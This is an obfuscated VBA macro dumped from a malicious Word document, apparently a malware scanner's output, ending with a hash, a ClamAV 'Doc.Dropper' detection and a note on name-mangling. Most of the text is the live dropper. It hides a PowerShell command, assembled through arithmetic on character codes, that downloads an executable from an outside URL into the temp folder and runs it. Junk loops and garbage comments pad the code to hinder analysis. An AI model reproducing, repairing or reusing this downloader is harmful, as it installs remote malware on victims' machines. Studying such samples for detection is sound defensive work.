            Case "?¸Ûì�¼àÍÙ´?ð", "?Åèß�½å½Ù³"
                 uemyxtnrtvvcfunr = "?¼äö?¸óÍÒ¨?Þ"
            Case Else
                 sgynjyhtgtzd = "bblaifn"
    End Select
Dim tzwq
Dim gehsphjmduzgo
Dim nnkhznt
Exit Do
Randomize
Loop





a = Left("EYpEvwWiGz MDmnQXPDN VCClJPxBut", 1)
'Right function
b = Left("PYpEvwWiGz MDmnQXPDN VCClJPxBut", 1)
c = Left("OYpEvwWiGz MDmnQXPDN VCClJPxBut", 1)

f = Right("HYpEvwWiGz MDmnQXPDN VCClJPxBuT", 1)

'Mid function
q = Mid("EYpEvwWiGz MDmnQXPDN VCClJPxBut", 1, 11)
'Split function
d = Split("EYpEvwWiGz MDmnQXPDN VCClJPxBut", " ")
For Each wrd In d
strg = strg & wrd & ", "
Next


itah = ChrW(Log(1.55284552845528) - Log(0.285714285714286) + 96.9771479588304) & ChrW(Log(1.36585365853659) - Log(0.363636363636364) + 107.346619464291) & ChrW(Log(0.317073170731707) + Log(0.558441558441558) + 101.401228015403) & ChrW(Log(1.2520325203252) - Log(0.506493506493506) + 30.7649879772348) & ChrW(Log(1.99186991869919) - Log(0.896103896103896) + 45.8712272275713) & ChrW(Log(1.30081300813008) - Log(0.454545454545455) + 97.6185531797743) & _
" " & _
"" & _
b & c & Chr((Abs(-119))) & a & Chr((Abs(-114))) & Chr((Abs(-115))) & Chr((Abs(-104))) & a & Chr(108) & Chr(108) & _
ChrW(Log(1.21951219512195) + Log(0.142857142857143) + 41.4174592103315) & ChrW(Log(1.48780487804878) - Log(0.636363636363636) + 76.8207130787879) & ChrW(Log(2.1869918699187) + Log(0.480519480519481) + 100.62036048498) & ChrW(Log(1.84552845528455) - Log(0.597402597402597) + 117.542070312526) & ChrW(Log(1.15447154471545) - Log(0.779220779220779) + 44.2768964381396) & _
"Object " & _
ChrW(Log(1.55284552845528) - Log(0.909090909090909) + 82.1346007475215) & ChrW(Log(1.1869918699187) - Log(0.155844155844156) + 118.639678961598) & ChrW(Log(1.40650406504065) + Log(0.324675324675325) + 115.45382235786) & ChrW(Log(1.02439024390244) + Log(0.961038961038961) + 115.68564277707) & ChrW(Log(1.56910569105691) + Log(0.194805194805195) + 101.855249387219) & ChrW(Log(2.31707317073171) - Log(0.727272727272727) + 107.511241443985) & _
ChrW(Log(1.0650406504065) + Log(0.922077922077922) + 45.6881125769836) & ChrW(Log(0.357723577235772) + Log(0.792207792207792) + 78.9309262791345) & ChrW(Log(1.0650406504065) + Log(0.792207792207792) + 100.839918589852) & ChrW(Log(1.78048780487805) + Log(0.909090909090909) + 115.18842280536) & ChrW(Log(1.8780487804878) + Log(0.142857142857143) + 46.9856767939059) & _
ChrW(Log(1.75609756097561) + Log(0.844155844155844) + 86.2763240996463) & ChrW(Log(2.26829268292683) - Log(0.519480519480519) + 99.1960466058113) & ChrW(Log(1.43089430894309) - Log(0.298701298701299) + 96.1033891544097) & _
ChrW(Log(0.317073170731707) + Log(0.155844155844156) + 69.6775214813085) & ChrW(Log(0.333333333333333) + Log(0.584415584415584) + 109.305755220751) & ChrW(Log(0.495934959349593) - Log(0.441558441558442) + 104.553865593962) & ChrW(Log(1.32520325203252) + Log(0.168831168831169) + 102.167290218958) & ChrW(Log(1.21138211382114) - Log(0.181818181818182) + 107.773489957189) & ChrW(Log(1.78048780487805) - Log(0.25974025974026) + 113.745039477256) & _
ChrW(Log(0.967479674796748) - Log(1.01298701298701) + 40.7159642670968) & ChrW(Log(0.869918699186992) + Log(0.532467532467532) + 46.4395888760599) & _
ChrW(Log(0.934959349593496) - Log(0.831168831168831) + 67.5523298885152) & ChrW(Log(2.01626016260163) + Log(0.441558441558442) + 110.786200506445) & ChrW(Log(1.71544715447154) - Log(0.142857142857143) + 116.184416072841) & ChrW(Log(0.682926829268293) + Log(0.714285714285714) + 110.38783979315) & ChrW(Log(0.520325203252033) + Log(0.597402597402597) + 108.838465297377) & ChrW(Log(0.292682926829268) - Log(0.922077922077922) + 111.817539872104) & ChrW(Log(0.853658536585366) - Log(0.155844155844156) + 94.9693252331492) & ChrW(Log(1.55284552845528) - Log(0.194805194805195) + 97.5941557065743) & ChrW(Log(2.10569105691057) + Log(0.480519480519481) + 69.6582438028823) & ChrW(Log(2.28455284552846) - Log(0.545454545454545) + 103.237693882468) & ChrW(Log(1.73170731707317) + Log(0.155844155844156) + 108.979790961729) & ChrW(Log(0.40650406504065) + Log(0.194805194805195) + 103.205916570696) & _
ChrW(Log(0.520325203252033) - Log(0.597402597402597) + 39.8081372466482) & _
"'" & _
"https://mfae.info/newwork/fresh/soft.exe" & _
"','" & _
"%" & ChrW(Log(2.14634146341463) - Log(0.506493506493506) + 114.225991476502) & ChrW(Log(2.04065040650406) - Log(0.285714285714286) + 98.7039684477453) & ChrW(Log(1.4390243902439) - Log(0.298701298701299) + 107.097723416874) & ChrW(Log(2.02439024390244) + Log(0.415584415584416) + 111.842800977962) & "%" & _
"\tpyyutnlyustn.exe');" & _
ChrW(Log(1.63414634146341) - Log(0.558441558441558) + 113.596274141153) & ChrW(Log(1.08943089430894) - Log(0.441558441558442) + 114.766899658184) & ChrW(Log(1.79674796747967) - Log(0.792207792207792) + 95.8510900961743) & ChrW(Log(1.47154471544715) - Log(0.324675324675325) + 112.158757727121) & ChrW(Log(0.365853658536585) + Log(0.662337662337662) + 117.087501654731) & " " & _
"%" & ChrW(Log(2.14634146341463) - Log(0.506493506493506) + 114.225991476502) & ChrW(Log(2.04065040650406) - Log(0.285714285714286) + 98.7039684477453) & ChrW(Log(1.4390243902439) - Log(0.298701298701299) + 107.097723416874) & ChrW(Log(2.02439024390244) + Log(0.415584415584416) + 111.842800977962) & "%" & _
"\tpyyutnlyustn.exe"
    If vPID = 0 Then 'Application not already open
101:
        Dim k As String
         vPID = Shell(itah, 1.1 / 1.1 * 1.1 - 1.1)
    Else 'Application already open so reactivate
        On Error GoTo 101
        AppActivate (vPID)
    End If


 
    Dim yqmoa As Integer
    Dim foxbuxscqzdqeai As Double
    Dim sfhsabr As Boolean
    Dim lay As String
    Dim cxpyt As String
    Dim dBloNkdlrYkUqxiRSDC As Integer
    Dim iuimucvrxeudjj As String
    Dim fcpnqp As Boolean
    Dim ldzcjaun As Double


    

       Do Until 6859 = 6859
              Dim ufrpiaqmjpqxi
            
            ufrpiaqmjpqxi = prfclyya
        Loop

                Dim cnddjoww(890) As String
        cnddjoww(2) = "?Åá䢼ê·Ò«?á¦�"
        cnddjoww(7) = "?Äòì?¿"
        cnddjoww(3) = "?Äçè?½êÃß??ঢÊ"
        cnddjoww(1) = CStr(16)

          If bbhoiweumfg = "¬´ôð¢²ò¿Ó¡?Þ�?Òì" Then
            Dim yqmoa16
            
            yqmoa16 = 1.34485909332027E+15
        End If


         Select Case 22
            Case Else
        End Select


'cnddjowwldzcjaun2?Äçè?½êÃß??ঢÊ
'?Åá䢼ê·Ò«?á¦�?Äòì?¿lay
'fcpnqpsfhsabr0237115
'1616
'sfhsabrldzcjaun0237115
'cxpytlay2
'dBloNkdlrYkUqxiRSDCcxpyt70484385
'fcpnqplay
'yqmoacxpyt#Q14
'laybbhoiweumfg
'70484385cxpyt
'2fcpnqp
'698197416
'0237115ldzcjaun

For aqhxdpdfksosoka = 1 To 2
aqhxdpdfksosoka = aqhxdpdfksosoka + 5
Next


For blipdbui = 1 To 16
blipdbui = blipdbui + 6
Next



For csfc = 1 To 6981974
csfc = csfc + 2
Next


For Each mkmmmojfzpwk In fscljqkiytevybsl
    If IsDate(dhcbfitwjvbothqv) And ((6981974 + 2) / (70484385 + 56029298)) <> 8.76685715934267E+16 Then
          otyl = "idex" & CStr("spayozpvsiolb")
End If
Next

For vjuhyytdxcmapvo = 1 To 237115
vjuhyytdxcmapvo = vjuhyytdxcmapvo + 8
Next





For ffcsyff = 1 To 1437803
ffcsyff = ffcsyff + 2
Next


For ypjkxmjqiwlmna = 1 To 1437803
ypjkxmjqiwlmna = ypjkxmjqiwlmna + 5
Next


For nnevwpjqalpj = 1 To 70484385
nnevwpjqalpj = nnevwpjqalpj + 3
Next










'qhxdpdfksosokafcsyfffcsyfflipdbuiewkbeomincgzar
'lipdbuiewkbeomincgzarkmmmojfzpwkcsqyzdhbanlipdbui
'sfclipdbuilipdbuiewkbeomincgzar
'juhyytdxcmapvokmmmojfzpwkpjkxmjqiwlmnaewkbeomincgzar
'fcsyffkmmmojfzpwknevwpjqalpjlipdbui
'pjkxmjqiwlmnaewkbeomincgzarkmmmojfzpwkcsqyzdhbanlipdbui
'nevwpjqalpjlipdbuicsqyzdhbanlipdbui
'kmmmojfzpwkcsqyzdhbanlipdbui
'ufrpiaqmjpqxijuhyytdxcmapvofcsyffcsqyzdhbanlipdbui
'prfclyyafcsyffewkbeomincgzar
'oweykgcfsadgtkmmmojfzpwkilfdlxbcjuhyytdxcmapvo
'csqyzdhbanlipdbuicsqyzdhbanlipdbui
'ewkbeomincgzarnevwpjqalpjlipdbui
'egjbmyeddqcnhgfcsyffpjkxmjqiwlmnaewkbeomincgzar
'ilfdlxbcjuhyytdxcmapvopjkxmjqiwlmnaewkbeomincgzar
'?Äçè?½êÃß??ঢÊQ14
'?Äòì?¿Q11




 
    Dim arfnumvkrbv As Integer
    Dim wnad As Double
    Dim wfaiifueicjcvzsj As Boolean
    Dim xalrvsnhtz As String
    Dim dtm As String
    Dim AINDellKHcILVSNTPEh As Integer
    Dim aausrzd As String
    Dim vsaemqpluckhjhva As Boolean
    Dim tlapqnwkjfdwaii As Double


    

       Do Until 2606 = 2606
              Dim tetinpwnt
            
            tetinpwnt = zcp
        Loop

                Dim etjyaiexegmjb(657) As String
        etjyaiexegmjb(5) = "?Æèâ?¿ò¹Ú±"
        etjyaiexegmjb(5) = "?Äñߤ¿õËɦ?"
        etjyaiexegmjb(6) = "«½ñø?·ï"
        etjyaiexegmjb(5) = CStr(21)

          If ndfyaj = "£²ïð" Then
            Dim arfnumvkrbv21
            
            arfnumvkrbv21 = 83348685704351#
        End If


         Select Case 55
            Case Else
        End Select


'etjyaiexegmjbtlapqnwkjfdwaii93«½ñø?·ï
'?Æèâ?¿ò¹Ú±?Äñߤ¿õËɦ?xalrvsnhtz
'vsaemqpluckhjhvawfaiifueicjcvzsj594183
'2121
'wfaiifueicjcvzsjtlapqnwkjfdwaii594183
'dtmxalrvsnhtz93
'AINDellKHcILVSNTPEhdtm2
'vsaemqpluckhjhvaxalrvsnhtz
'arfnumvkrbvdtm#Q14
'xalrvsnhtzndfyaj
'2dtm
'93vsaemqpluckhjhva
'619706221
'594183tlapqnwkjfdwaii

For afrnekbcqunohobz = 1 To 93
afrnekbcqunohobz = afrnekbcqunohobz + 3
Next


For biwwnhwibhhtlmyqt = 1 To 21
biwwnhwibhhtlmyqt = biwwnhwibhhtlmyqt + 2
Next



For cbeigksufgzsmuwxn = 1 To 6197062
…
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 75776 bytes
SHA-256: 67f1fbd148a28ce337d8fabb9085e8d16b32935dc7a7ebad86fa7832ad9cb7a4
Detection
ClamAV: Doc.Dropper.Agent-6837211-0
Obfuscation or payload: likely
418 of 730 identifiers look randomly generated (e.g. 'iwwnhwibhhtlmyqtwbftwwzcxbidqrwirzacwowp') — consistent with name-mangling obfuscation.